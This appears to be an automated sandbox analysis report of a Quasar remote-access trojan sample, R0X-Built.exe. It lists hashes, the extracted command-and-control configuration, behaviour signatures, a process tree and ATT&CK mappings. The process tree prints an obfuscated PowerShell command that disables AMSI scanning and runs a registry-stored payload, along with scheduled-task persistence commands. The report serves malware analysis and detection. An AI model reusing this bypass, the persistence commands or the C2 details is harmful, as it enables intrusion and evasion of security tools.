Analysis

  • max time kernel
    1800s
  • max time network
    1799s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240426-en
  • resource tags

    arch:x64arch:x86image:win11-20240426-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    02-05-2024 20:59

General

  • Target

    R0X-Built.exe

  • Size

    409KB

  • MD5

    a0f5aa5764c4f66eee82f857f9f447b6

  • SHA1

    3c3a780d020cb3eb3088223443fe813abb95dccd

  • SHA256

    43c6b9b6c241dbd6ad1bde7980026235373374d5e836fb6c794354a15e678ef3

  • SHA512

    458c03ae490e409598b8e9e89911b0757fb61411fbc45a60ecefed3c13d0fc96b7bc205afe1fb3e0f7585eb163f102754ec9259691eca1bfa00b028f74eb8384

  • SSDEEP

    6144:RMX2pJAJcC0B61K6qZ1fQ57P/EwXhb4azmosb+lfXdOIFyoOOfTA3pwF:lpyJcC+uK6qZ1G8QJjbfNOSOObA3pwF

Malware Config

Extracted

Family

quasar

Version

3.1.5

Botnet

Slave

C2

even-lemon.gl.at.ply.gg:33587

Mutex

$Sxr-3vDee7FzoJnhqjuE3n

Attributes
  • encryption_key

    KaNwItdY6wlv5nCN4prL

  • install_name

    $srr-powershell.exe

  • log_directory

    Logs

  • reconnect_delay

    1000

  • startup_key

    $srr-powershell

  • subdirectory

    Windows

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 11 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Checks processor information in registry 2 TTPs 7 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Modifies data under HKEY_USERS 61 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of UnmapMainImage 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:636
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:424
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{c6b4efde-adfd-4cb1-963c-6a3a10c1b5f8}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1180
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
          PID:692
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
          1⤵
            PID:988
          • C:\Windows\System32\svchost.exe
            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
            1⤵
              PID:404
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
              1⤵
                PID:1032
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                1⤵
                  PID:1056
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                  1⤵
                    PID:1076
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                    1⤵
                      PID:1188
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                      1⤵
                        PID:1256
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:MqfigKXvmhNc{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$CdjMFtGAxUsNbb,[Parameter(Position=1)][Type]$MaWzZiFeXv)$TPdGxslMGUL=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+'f'+[Char](108)+''+[Char](101)+''+'c'+'t'+[Char](101)+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+'g'+''+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('In'+'M'+''+'e'+'mo'+[Char](114)+''+[Char](121)+''+[Char](77)+'od'+[Char](117)+'l'+[Char](101)+'',$False).DefineType(''+[Char](77)+'y'+'D'+'e'+[Char](108)+''+'e'+'g'+[Char](97)+''+'t'+'e'+'T'+'yp'+'e'+'',''+[Char](67)+''+'l'+'as'+[Char](115)+''+[Char](44)+''+[Char](80)+''+'u'+''+'b'+''+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+'S'+''+[Char](101)+''+'a'+''+'l'+'e'+'d'+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+[Char](115)+''+'i'+''+[Char](67)+''+[Char](108)+'a'+[Char](115)+''+[Char](115)+','+[Char](65)+''+[Char](117)+'t'+[Char](111)+''+[Char](67)+''+[Char](108)+'a'+'s'+''+[Char](115)+'',[MulticastDelegate]);$TPdGxslMGUL.DefineConstructor('RT'+[Char](83)+''+[Char](112)+'eci'+'a'+'l'+[Char](78)+''+[Char](97)+''+'m'+''+'e'+''+','+''+[Char](72)+''+[Char](105)+'d'+[Char](101)+''+'B'+''+'y'+''+'S'+''+[Char](105)+''+[Char](103)+''+[Char](44)+'Pu'+[Char](98)+'l'+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$CdjMFtGAxUsNbb).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+'t'+[Char](105)+''+'m'+''+'e'+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+'g'+''+[Char](101)+'d');$TPdGxslMGUL.DefineMethod(''+[Char](73)+''+'n'+''+'v'+''+[Char](111)+''+'k'+''+[Char](101)+'','P'+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+[Char](99)+''+[Char](44)+''+'H'+''+[Char](105)+'de'+[Char](66)+'y'+[Char](83)+''+[Char](105)+'g,'+[Char](78)+''+'e'+''+[Char](119)+'S'+[Char](108)+''+'o'+'t'+','+'Vi'+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+'l',$MaWzZiFeXv,$CdjMFtGAxUsNbb).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+'t'+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+'n'+[Char](97)+''+[Char](103)+'e'+'d'+'');Write-Output $TPdGxslMGUL.CreateType();}$PvxpIQuFKJsNv=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+'s'+'t'+[Char](101)+''+[Char](109)+''+'.'+''+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType(''+'M'+''+[Char](105)+''+[Char](99)+''+[Char](114)+'o'+[Char](115)+'o'+[Char](102)+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+'i'+''+'n'+''+'3'+''+[Char](50)+''+'.'+'U'+'n'+''+[Char](115)+'a'+'f'+''+[Char](101)+''+'N'+''+'a'+''+[Char](116)+''+'i'+''+[Char](118)+''+[Char](101)+'Me'+'t'+''+[Char](104)+'o'+'d'+''+'s'+'');$ghXYzhYGmhyEJY=$PvxpIQuFKJsNv.GetMethod('G'+'e'+''+'t'+''+[Char](80)+''+[Char](114)+''+[Char](111)+'cAd'+[Char](100)+'r'+[Char](101)+'s'+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+'u'+'b'+'l'+''+'i'+''+[Char](99)+','+[Char](83)+''+[Char](116)+'a'+'t'+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$VqQnOSdQNyHRPBCDxaX=MqfigKXvmhNc @([String])([IntPtr]);$etEAddbhcpZsHyIqFFLeba=MqfigKXvmhNc @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$djhyltdeyyk=$PvxpIQuFKJsNv.GetMethod('Ge'+'t'+'M'+'o'+''+'d'+'u'+[Char](108)+''+'e'+''+[Char](72)+''+[Char](97)+''+[Char](110)+''+'d'+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+'k'+''+'e'+''+[Char](114)+''+[Char](110)+''+[Char](101)+'l'+[Char](51)+''+[Char](50)+'.'+[Char](100)+''+[Char](108)+'l')));$IAZLIcvHfMsaGT=$ghXYzhYGmhyEJY.Invoke($Null,@([Object]$djhyltdeyyk,[Object](''+[Char](76)+''+[Char](111)+''+'a'+''+'d'+''+'L'+''+'i'+''+[Char](98)+'r'+[Char](97)+'r'+[Char](121)+''+'A'+'')));$cpqXNQwqtwJPZKdeL=$ghXYzhYGmhyEJY.Invoke($Null,@([Object]$djhyltdeyyk,[Object](''+[Char](86)+''+'i'+''+'r'+''+'t'+''+[Char](117)+'a'+'l'+''+[Char](80)+''+[Char](114)+'o'+[Char](116)+'e'+'c'+''+'t'+'')));$oxBvDhs=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($IAZLIcvHfMsaGT,$VqQnOSdQNyHRPBCDxaX).Invoke(''+[Char](97)+''+[Char](109)+''+'s'+''+'i'+''+[Char](46)+''+[Char](100)+''+[Char](108)+'l');$userMYOiMlDzvxeEL=$ghXYzhYGmhyEJY.Invoke($Null,@([Object]$oxBvDhs,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+'iS'+[Char](99)+''+[Char](97)+'n'+[Char](66)+'u'+'f'+''+'f'+''+[Char](101)+''+[Char](114)+'')));$HiHBDEMCCS=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($cpqXNQwqtwJPZKdeL,$etEAddbhcpZsHyIqFFLeba).Invoke($userMYOiMlDzvxeEL,[uint32]8,4,[ref]$HiHBDEMCCS);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$userMYOiMlDzvxeEL,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($cpqXNQwqtwJPZKdeL,$etEAddbhcpZsHyIqFFLeba).Invoke($userMYOiMlDzvxeEL,[uint32]8,0x20,[ref]$HiHBDEMCCS);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+[Char](70)+''+[Char](84)+''+'W'+''+[Char](65)+''+[Char](82)+'E').GetValue(''+'$'+''+[Char](55)+''+[Char](55)+'stage'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                          2⤵
                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                          • Drops file in System32 directory
                          • Suspicious use of SetThreadContext
                          • Modifies data under HKEY_USERS
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:664
                      • C:\Windows\System32\svchost.exe
                        C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
                        1⤵
                          PID:1280
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                          1⤵
                            PID:1312
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                            1⤵
                              PID:1340
                            • C:\Windows\System32\svchost.exe
                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                              1⤵
                              • Drops file in System32 directory
                              PID:1444
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                              1⤵
                                PID:1528
                                • C:\Windows\system32\sihost.exe
                                  sihost.exe
                                  2⤵
                                    PID:2584
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                  1⤵
                                    PID:1540
                                  • C:\Windows\System32\svchost.exe
                                    C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                    1⤵
                                      PID:1556
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                      1⤵
                                        PID:1692
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k NetworkService -p
                                        1⤵
                                          PID:1704
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                          1⤵
                                            PID:1736
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                            1⤵
                                              PID:1820
                                            • C:\Windows\system32\svchost.exe
                                              C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                              1⤵
                                                PID:1876
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                1⤵
                                                  PID:1900
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                  1⤵
                                                    PID:1912
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                    1⤵
                                                      PID:2004
                                                    • C:\Windows\system32\svchost.exe
                                                      C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                      1⤵
                                                        PID:2024
                                                      • C:\Windows\System32\spoolsv.exe
                                                        C:\Windows\System32\spoolsv.exe
                                                        1⤵
                                                          PID:1832
                                                        • C:\Windows\System32\svchost.exe
                                                          C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                          1⤵
                                                            PID:2240
                                                          • C:\Windows\System32\svchost.exe
                                                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                            1⤵
                                                              PID:2348
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                              1⤵
                                                                PID:2596
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                1⤵
                                                                  PID:2604
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                  1⤵
                                                                    PID:2612
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k NetworkService -p
                                                                    1⤵
                                                                    • Drops file in System32 directory
                                                                    PID:2696
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                    1⤵
                                                                      PID:2748
                                                                    • C:\Windows\sysmon.exe
                                                                      C:\Windows\sysmon.exe
                                                                      1⤵
                                                                        PID:2776
                                                                      • C:\Windows\System32\svchost.exe
                                                                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                        1⤵
                                                                          PID:2792
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                          1⤵
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:2804
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                          1⤵
                                                                            PID:2816
                                                                          • C:\Windows\system32\wbem\unsecapp.exe
                                                                            C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                            1⤵
                                                                              PID:3180
                                                                            • C:\Windows\Explorer.EXE
                                                                              C:\Windows\Explorer.EXE
                                                                              1⤵
                                                                              • Suspicious use of UnmapMainImage
                                                                              PID:3256
                                                                              • C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe"
                                                                                2⤵
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                • Suspicious use of WriteProcessMemory
                                                                                PID:5012
                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                  "schtasks" /create /tn "$srr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe" /rl HIGHEST /f
                                                                                  3⤵
                                                                                  • Creates scheduled task(s)
                                                                                  PID:1712
                                                                                • C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exe
                                                                                  "C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exe"
                                                                                  3⤵
                                                                                  • Executes dropped EXE
                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  • Suspicious use of WriteProcessMemory
                                                                                  PID:3760
                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                    "schtasks" /create /tn "$srr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exe" /rl HIGHEST /f
                                                                                    4⤵
                                                                                    • Creates scheduled task(s)
                                                                                    PID:4052
                                                                                • C:\Users\Admin\AppData\Local\Temp\install.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\install.exe"
                                                                                  3⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:1992
                                                                                • C:\Windows\SysWOW64\SCHTASKS.exe
                                                                                  "SCHTASKS.exe" /create /tn "$77R0X-Built.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe'" /sc onlogon /rl HIGHEST
                                                                                  3⤵
                                                                                  • Creates scheduled task(s)
                                                                                  PID:4628
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                              1⤵
                                                                                PID:3508
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
                                                                                1⤵
                                                                                  PID:3548
                                                                                • C:\Windows\System32\RuntimeBroker.exe
                                                                                  C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                  1⤵
                                                                                    PID:3912
                                                                                  • C:\Windows\System32\RuntimeBroker.exe
                                                                                    C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                    1⤵
                                                                                    • Suspicious use of UnmapMainImage
                                                                                    PID:4028
                                                                                  • C:\Windows\system32\DllHost.exe
                                                                                    C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                    1⤵
                                                                                    • Modifies registry class
                                                                                    PID:4072
                                                                                  • C:\Windows\system32\svchost.exe
                                                                                    C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
                                                                                    1⤵
                                                                                      PID:1044
                                                                                    • C:\Windows\system32\DllHost.exe
                                                                                      C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
                                                                                      1⤵
                                                                                        PID:4288
                                                                                      • C:\Windows\system32\svchost.exe
                                                                                        C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
                                                                                        1⤵
                                                                                          PID:4440
                                                                                        • C:\Windows\system32\svchost.exe
                                                                                          C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                          1⤵
                                                                                            PID:2568
                                                                                          • C:\Windows\system32\svchost.exe
                                                                                            C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                            1⤵
                                                                                              PID:484
                                                                                            • C:\Windows\System32\svchost.exe
                                                                                              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                              1⤵
                                                                                                PID:1596
                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                1⤵
                                                                                                • Modifies data under HKEY_USERS
                                                                                                PID:5048
                                                                                              • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                1⤵
                                                                                                • Drops file in System32 directory
                                                                                                • Modifies data under HKEY_USERS
                                                                                                PID:1516
                                                                                              • C:\Windows\system32\SppExtComObj.exe
                                                                                                C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                1⤵
                                                                                                  PID:2560
                                                                                                • C:\Windows\System32\svchost.exe
                                                                                                  C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                  1⤵
                                                                                                    PID:2436
                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                    1⤵
                                                                                                      PID:3772
                                                                                                    • C:\Windows\system32\DllHost.exe
                                                                                                      C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                      1⤵
                                                                                                      • Drops file in System32 directory
                                                                                                      PID:3588
                                                                                                    • C:\Windows\System32\RuntimeBroker.exe
                                                                                                      C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                      1⤵
                                                                                                        PID:756
                                                                                                      • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                        C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                        1⤵
                                                                                                        • Checks BIOS information in registry
                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                        PID:1048
                                                                                                      • C:\Windows\system32\DllHost.exe
                                                                                                        C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                        1⤵
                                                                                                          PID:2324
                                                                                                        • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                          "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:Global.Accounts.AppXqe94epy97qwa6w3j6w132e8zvcs117nd.mca
                                                                                                          1⤵
                                                                                                            PID:1176
                                                                                                            • C:\Windows\system32\WerFault.exe
                                                                                                              C:\Windows\system32\WerFault.exe -u -p 1176 -s 944
                                                                                                              2⤵
                                                                                                              • Checks processor information in registry
                                                                                                              • Enumerates system info in registry
                                                                                                              PID:3504
                                                                                                          • C:\Windows\System32\svchost.exe
                                                                                                            C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                            1⤵
                                                                                                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                            PID:4744
                                                                                                            • C:\Windows\system32\WerFault.exe
                                                                                                              C:\Windows\system32\WerFault.exe -pss -s 408 -p 1176 -ip 1176
                                                                                                              2⤵
                                                                                                                PID:3404
                                                                                                            • C:\Windows\System32\RuntimeBroker.exe
                                                                                                              C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                              1⤵
                                                                                                              • Modifies registry class
                                                                                                              PID:4100
                                                                                                            • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                              "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                                                                                                              1⤵
                                                                                                                PID:4456
                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                1⤵
                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                PID:4472
                                                                                                              • C:\Windows\system32\BackgroundTransferHost.exe
                                                                                                                "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
                                                                                                                1⤵
                                                                                                                  PID:1612
                                                                                                                • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                                  "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                                                                                                                  1⤵
                                                                                                                    PID:1052
                                                                                                                  • C:\Windows\system32\BackgroundTransferHost.exe
                                                                                                                    "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
                                                                                                                    1⤵
                                                                                                                      PID:1700
                                                                                                                    • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                                      "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                                                                                                                      1⤵
                                                                                                                        PID:244

                                                                                                                      Network

                                                                                                                      MITRE ATT&CK Matrix ATT&CK v13

                                                                                                                      Execution

                                                                                                                      Scheduled Task/Job

                                                                                                                      1
                                                                                                                      T1053

                                                                                                                      Persistence

                                                                                                                      Scheduled Task/Job

                                                                                                                      1
                                                                                                                      T1053

                                                                                                                      Privilege Escalation

                                                                                                                      Scheduled Task/Job

                                                                                                                      1
                                                                                                                      T1053

                                                                                                                      Discovery

                                                                                                                      Query Registry

                                                                                                                      3
                                                                                                                      T1012

                                                                                                                      System Information Discovery

                                                                                                                      3
                                                                                                                      T1082

                                                                                                                      Command and Control

                                                                                                                      Web Service

                                                                                                                      1
                                                                                                                      T1102

                                                                                                                      Replay Monitor

                                                                                                                      Loading Replay Monitor...

                                                                                                                      Downloads

                                                                                                                      • C:\ProgramData\Microsoft\Windows\WER\Temp\WER.dd72fd9f-5464-421a-92aa-5e2d79a31715.tmp.csv
                                                                                                                        Filesize

                                                                                                                        35KB

                                                                                                                        MD5

                                                                                                                        dd7f2259941ccf7fdcd4623827a70c39

                                                                                                                        SHA1

                                                                                                                        5938b2a83007d1fc2c7794bd1558264764eb2e7d

                                                                                                                        SHA256

                                                                                                                        bd440b3bc134563c39c2fff233d89b0586b33cf30bcd7d673ad26b2718581df0

                                                                                                                        SHA512

                                                                                                                        fa7a18977da874382db06a60c9797bd46ae9cb14ca6f0eea36a4e306a09e839a8ef002018cc567a8544b4831d037133a8e49652a3328091d14933030ae642905

                                                                                                                      • C:\ProgramData\Microsoft\Windows\WER\Temp\WER.f2bedc36-a7a3-45a2-add6-02baba503139.tmp.txt
                                                                                                                        Filesize

                                                                                                                        13KB

                                                                                                                        MD5

                                                                                                                        e901f0ba4a10f11c2c7e7b74595fb1a7

                                                                                                                        SHA1

                                                                                                                        787891772d4abedc5c5f1da12f6fd419ec0ffdcb

                                                                                                                        SHA256

                                                                                                                        46ff7763cfef5d58f2bc3b0d1dbc8d5d149411569471b6bc8150e41534e04fa0

                                                                                                                        SHA512

                                                                                                                        980bb2ecf865cfa28d9f1854e757b508ba49ccdb55e1b63c145a55b5fb46e66ab1642a17ccf8a6cab097753e5cfb283a5106f8cdc040751d4fde6b587afc97e2

                                                                                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
                                                                                                                        Filesize

                                                                                                                        404B

                                                                                                                        MD5

                                                                                                                        1db77e7ab7bec42c5baa88962e6a4f8b

                                                                                                                        SHA1

                                                                                                                        f199bd9f52863815a82365d933ad1340b12939ce

                                                                                                                        SHA256

                                                                                                                        b38893ed8cf63bea0e2b1e027c0fd3b02da264b8dfa7d3800e95d29ae7770dec

                                                                                                                        SHA512

                                                                                                                        9d70ae70c7a6484126b2de763c16148d7b4b26238242d40c290bd8f2d6e922a52f535351e9b088a116826069d5829813cf44a5c6487cfb23aac56807002ccb5c

                                                                                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
                                                                                                                        Filesize

                                                                                                                        404B

                                                                                                                        MD5

                                                                                                                        3f2b63938e9f541cd029b03da2072020

                                                                                                                        SHA1

                                                                                                                        08474e4627b1bc666aba96df8125c0b0ecf6c4e1

                                                                                                                        SHA256

                                                                                                                        1bbd9a208192cfc3eb123aca41923432b2d70d51eb57df665410d5fdc51fb4d5

                                                                                                                        SHA512

                                                                                                                        0661242c9a7a7aa1e65ab15962466864cde31430edb7cc0129e9c9e09848e862784b1302152fb95949fa2a341cc407e8fe1f0119cf81ced11abae03c5c18699a

                                                                                                                      • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749
                                                                                                                        Filesize

                                                                                                                        290B

                                                                                                                        MD5

                                                                                                                        2ef2d0ab18734128978f40bbbfb94c24

                                                                                                                        SHA1

                                                                                                                        68ce2f175135fbd12a94dd03164c714578eb7d43

                                                                                                                        SHA256

                                                                                                                        1b8855e748d23bb3d5b256b5e5638208c4127ae4d5163aafe6cdd348cee0ae16

                                                                                                                        SHA512

                                                                                                                        a69cbcf86d55c748dd6c829765cdb77912423f00567929e6b2948d6b72a7129c76f71409e1892eaf331478356467244e62435ae10645d49dd1c2ba3350bf97d1

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\install.exe
                                                                                                                        Filesize

                                                                                                                        162KB

                                                                                                                        MD5

                                                                                                                        152e3f07bbaf88fb8b097ba05a60df6e

                                                                                                                        SHA1

                                                                                                                        c4638921bb140e7b6a722d7c4d88afa7ed4e55c8

                                                                                                                        SHA256

